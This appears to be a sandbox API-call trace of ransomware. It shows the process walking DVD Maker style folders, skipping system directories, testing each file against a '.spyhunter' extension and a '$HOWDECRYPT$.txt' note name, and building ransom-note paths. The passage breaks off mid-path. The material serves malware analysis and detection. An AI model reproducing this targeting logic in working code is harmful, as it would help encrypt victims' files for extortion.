[0093.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10a) returned 0x383868 [0093.121] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0093.121] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.121] lstrcmpiW (lpString1="scenesscroll.png", lpString2="Windows") returned -1 [0093.121] lstrlenW (lpString="Windows") returned 7 [0093.121] lstrcmpiW (lpString1="scenesscroll.png", lpString2="$Recycle.bin") returned 1 [0093.121] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.121] lstrcmpiW (lpString1="scenesscroll.png", lpString2="System Volume Information") returned -1 [0093.121] lstrlenW (lpString="System Volume Information") returned 25 [0093.121] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png") returned 80 [0093.121] StrStrIW (lpFirst="scenesscroll.png", lpSrch=".spyhunter") returned 0x0 [0093.121] lstrcmpW (lpString1="scenesscroll.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.121] lstrcmpW (lpString1="scenesscroll.png", lpString2="_uninstalling_.png") returned 1 [0093.121] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png") returned 80 [0093.121] GetProcessHeap () returned 0x2c0000 [0093.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34ef68 [0093.121] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0093.121] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.121] lstrcmpiW (lpString1="specialmainsubpicture.png", lpString2="Windows") returned -1 [0093.121] lstrlenW (lpString="Windows") returned 7 [0093.121] lstrcmpiW (lpString1="specialmainsubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.121] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.122] lstrcmpiW (lpString1="specialmainsubpicture.png", lpString2="System Volume Information") returned -1 [0093.122] lstrlenW (lpString="System Volume Information") returned 25 [0093.122] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png") returned 89 [0093.122] StrStrIW (lpFirst="specialmainsubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.122] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.122] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png") returned 89 [0093.122] GetProcessHeap () returned 0x2c0000 [0093.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a360 [0093.122] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0093.122] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.122] lstrcmpiW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.122] lstrlenW (lpString="Windows") returned 7 [0093.122] lstrcmpiW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.122] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.122] lstrcmpiW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.122] lstrlenW (lpString="System Volume Information") returned 25 [0093.122] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png") returned 103 [0093.122] StrStrIW (lpFirst="SpecialNavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.122] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.122] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.122] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png") returned 103 [0093.122] GetProcessHeap () returned 0x2c0000 [0093.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x110) returned 0x383980 [0093.123] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0093.123] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.123] lstrcmpiW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.123] lstrlenW (lpString="Windows") returned 7 [0093.123] lstrcmpiW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.123] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.123] lstrcmpiW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.123] lstrlenW (lpString="System Volume Information") returned 25 [0093.123] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png") returned 109 [0093.123] StrStrIW (lpFirst="SpecialNavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.123] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.123] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.123] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png") returned 109 [0093.123] GetProcessHeap () returned 0x2c0000 [0093.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x37b480 [0093.123] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0093.123] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.123] lstrcmpiW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.123] lstrlenW (lpString="Windows") returned 7 [0093.123] lstrcmpiW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.124] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.124] lstrcmpiW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.124] lstrlenW (lpString="System Volume Information") returned 25 [0093.124] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png") returned 104 [0093.124] StrStrIW (lpFirst="SpecialNavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.124] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.124] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.124] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png") returned 104 [0093.124] GetProcessHeap () returned 0x2c0000 [0093.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x112) returned 0x383a98 [0093.124] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0093.124] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.124] lstrcmpiW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.124] lstrlenW (lpString="Windows") returned 7 [0093.124] lstrcmpiW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.124] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.124] lstrcmpiW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.124] lstrlenW (lpString="System Volume Information") returned 25 [0093.124] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png") returned 110 [0093.124] StrStrIW (lpFirst="SpecialNavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.124] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.124] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png") returned 110 [0093.125] GetProcessHeap () returned 0x2c0000 [0093.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x37ba48 [0093.125] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0093.125] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.125] lstrlenW (lpString="Windows") returned 7 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.125] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.125] lstrlenW (lpString="System Volume Information") returned 25 [0093.125] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 101 [0093.125] StrStrIW (lpFirst="SpecialNavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.125] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.125] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 101 [0093.125] GetProcessHeap () returned 0x2c0000 [0093.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10c) returned 0x3508c0 [0093.125] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0093.125] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.125] lstrlenW (lpString="Windows") returned 7 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.125] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.125] lstrcmpiW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.125] lstrlenW (lpString="System Volume Information") returned 25 [0093.126] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png") returned 107 [0093.126] StrStrIW (lpFirst="SpecialNavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.126] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.126] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png") returned 107 [0093.126] GetProcessHeap () returned 0x2c0000 [0093.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x3509d8 [0093.126] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0093.126] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.126] lstrcmpiW (lpString1="specialoccasion.png", lpString2="Windows") returned -1 [0093.126] lstrlenW (lpString="Windows") returned 7 [0093.126] lstrcmpiW (lpString1="specialoccasion.png", lpString2="$Recycle.bin") returned 1 [0093.126] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.126] lstrcmpiW (lpString1="specialoccasion.png", lpString2="System Volume Information") returned -1 [0093.126] lstrlenW (lpString="System Volume Information") returned 25 [0093.126] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png") returned 83 [0093.126] StrStrIW (lpFirst="specialoccasion.png", lpSrch=".spyhunter") returned 0x0 [0093.126] lstrcmpW (lpString1="specialoccasion.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.126] lstrcmpW (lpString1="specialoccasion.png", lpString2="_uninstalling_.png") returned 1 [0093.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png") returned 83 [0093.126] GetProcessHeap () returned 0x2c0000 [0093.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f238 [0093.126] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0093.126] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.127] lstrcmpiW (lpString1="whitemask1047.png", lpString2="Windows") returned -1 [0093.127] lstrlenW (lpString="Windows") returned 7 [0093.127] lstrcmpiW (lpString1="whitemask1047.png", lpString2="$Recycle.bin") returned 1 [0093.127] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.127] lstrcmpiW (lpString1="whitemask1047.png", lpString2="System Volume Information") returned 1 [0093.127] lstrlenW (lpString="System Volume Information") returned 25 [0093.127] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png") returned 81 [0093.127] StrStrIW (lpFirst="whitemask1047.png", lpSrch=".spyhunter") returned 0x0 [0093.127] lstrcmpW (lpString1="whitemask1047.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.127] lstrcmpW (lpString1="whitemask1047.png", lpString2="_uninstalling_.png") returned 1 [0093.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png") returned 81 [0093.127] GetProcessHeap () returned 0x2c0000 [0093.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ee78 [0093.127] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0093.127] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.127] lstrcmpiW (lpString1="whitevignette1047.png", lpString2="Windows") returned -1 [0093.127] lstrlenW (lpString="Windows") returned 7 [0093.127] lstrcmpiW (lpString1="whitevignette1047.png", lpString2="$Recycle.bin") returned 1 [0093.127] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.127] lstrcmpiW (lpString1="whitevignette1047.png", lpString2="System Volume Information") returned 1 [0093.127] lstrlenW (lpString="System Volume Information") returned 25 [0093.127] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png") returned 85 [0093.127] StrStrIW (lpFirst="whitevignette1047.png", lpSrch=".spyhunter") returned 0x0 [0093.128] lstrcmpW (lpString1="whitevignette1047.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.128] lstrcmpW (lpString1="whitevignette1047.png", lpString2="_uninstalling_.png") returned 1 [0093.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png") returned 85 [0093.128] GetProcessHeap () returned 0x2c0000 [0093.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0093.128] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0093.128] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.128] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.130] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\$HOWDECRYPT$.txt") returned 80 [0093.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\$HOWDECRYPT$.txt") returned 80 [0093.130] GetProcessHeap () returned 0x2c0000 [0093.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f148 [0093.131] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0093.131] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.131] lstrcmpiW (lpString1="Sports", lpString2="Windows") returned -1 [0093.131] lstrlenW (lpString="Windows") returned 7 [0093.131] lstrcmpiW (lpString1="Sports", lpString2="$Recycle.bin") returned 1 [0093.131] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.131] lstrcmpiW (lpString1="Sports", lpString2="System Volume Information") returned -1 [0093.131] lstrlenW (lpString="System Volume Information") returned 25 [0093.131] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 54 [0093.131] lstrcmpW (lpString1="Sports", lpString2=".") returned 1 [0093.131] lstrcmpW (lpString1="Sports", lpString2="..") returned 1 [0093.131] GetProcessHeap () returned 0x2c0000 [0093.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.131] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*") returned 56 [0093.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.151] lstrlenW (lpString="Windows") returned 7 [0093.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.151] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.151] lstrlenW (lpString="System Volume Information") returned 25 [0093.151] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\.") returned 56 [0093.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.151] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.151] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.151] lstrlenW (lpString="Windows") returned 7 [0093.151] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.151] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.151] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.151] lstrlenW (lpString="System Volume Information") returned 25 [0093.152] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\..") returned 57 [0093.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.152] lstrcmpiW (lpString1="CircleSubpicture.png", lpString2="Windows") returned -1 [0093.152] lstrlenW (lpString="Windows") returned 7 [0093.152] lstrcmpiW (lpString1="CircleSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.152] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.152] lstrcmpiW (lpString1="CircleSubpicture.png", lpString2="System Volume Information") returned -1 [0093.152] lstrlenW (lpString="System Volume Information") returned 25 [0093.152] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png") returned 75 [0093.152] StrStrIW (lpFirst="CircleSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.152] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.152] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png") returned 75 [0093.152] GetProcessHeap () returned 0x2c0000 [0093.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346488 [0093.152] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0093.152] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.152] lstrcmpiW (lpString1="GoldRing.png", lpString2="Windows") returned -1 [0093.152] lstrlenW (lpString="Windows") returned 7 [0093.152] lstrcmpiW (lpString1="GoldRing.png", lpString2="$Recycle.bin") returned 1 [0093.153] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.153] lstrcmpiW (lpString1="GoldRing.png", lpString2="System Volume Information") returned -1 [0093.153] lstrlenW (lpString="System Volume Information") returned 25 [0093.153] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png") returned 67 [0093.153] StrStrIW (lpFirst="GoldRing.png", lpSrch=".spyhunter") returned 0x0 [0093.153] lstrcmpW (lpString1="GoldRing.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.153] lstrcmpW (lpString1="GoldRing.png", lpString2="_uninstalling_.png") returned 1 [0093.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png") returned 67 [0093.153] GetProcessHeap () returned 0x2c0000 [0093.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358d60 [0093.153] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0093.153] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.153] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0093.153] lstrlenW (lpString="Windows") returned 7 [0093.153] lstrcmpiW (lpString1="highlight.png", lpString2="$Recycle.bin") returned 1 [0093.153] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.153] lstrcmpiW (lpString1="highlight.png", lpString2="System Volume Information") returned -1 [0093.153] lstrlenW (lpString="System Volume Information") returned 25 [0093.153] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png") returned 68 [0093.153] StrStrIW (lpFirst="highlight.png", lpSrch=".spyhunter") returned 0x0 [0093.153] lstrcmpW (lpString1="highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.153] lstrcmpW (lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0093.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png") returned 68 [0093.153] GetProcessHeap () returned 0x2c0000 [0093.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e560 [0093.154] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0093.154] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.154] lstrcmpiW (lpString1="NavigationButtonSubpicture.png", lpString2="Windows") returned -1 [0093.154] lstrlenW (lpString="Windows") returned 7 [0093.154] lstrcmpiW (lpString1="NavigationButtonSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.154] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.154] lstrcmpiW (lpString1="NavigationButtonSubpicture.png", lpString2="System Volume Information") returned -1 [0093.154] lstrlenW (lpString="System Volume Information") returned 25 [0093.154] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png") returned 85 [0093.154] StrStrIW (lpFirst="NavigationButtonSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.154] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.154] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.154] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png") returned 85 [0093.154] GetProcessHeap () returned 0x2c0000 [0093.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0093.154] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0093.155] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.155] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0093.155] lstrlenW (lpString="Windows") returned 7 [0093.155] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0093.155] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.155] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0093.155] lstrlenW (lpString="System Volume Information") returned 25 [0093.155] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 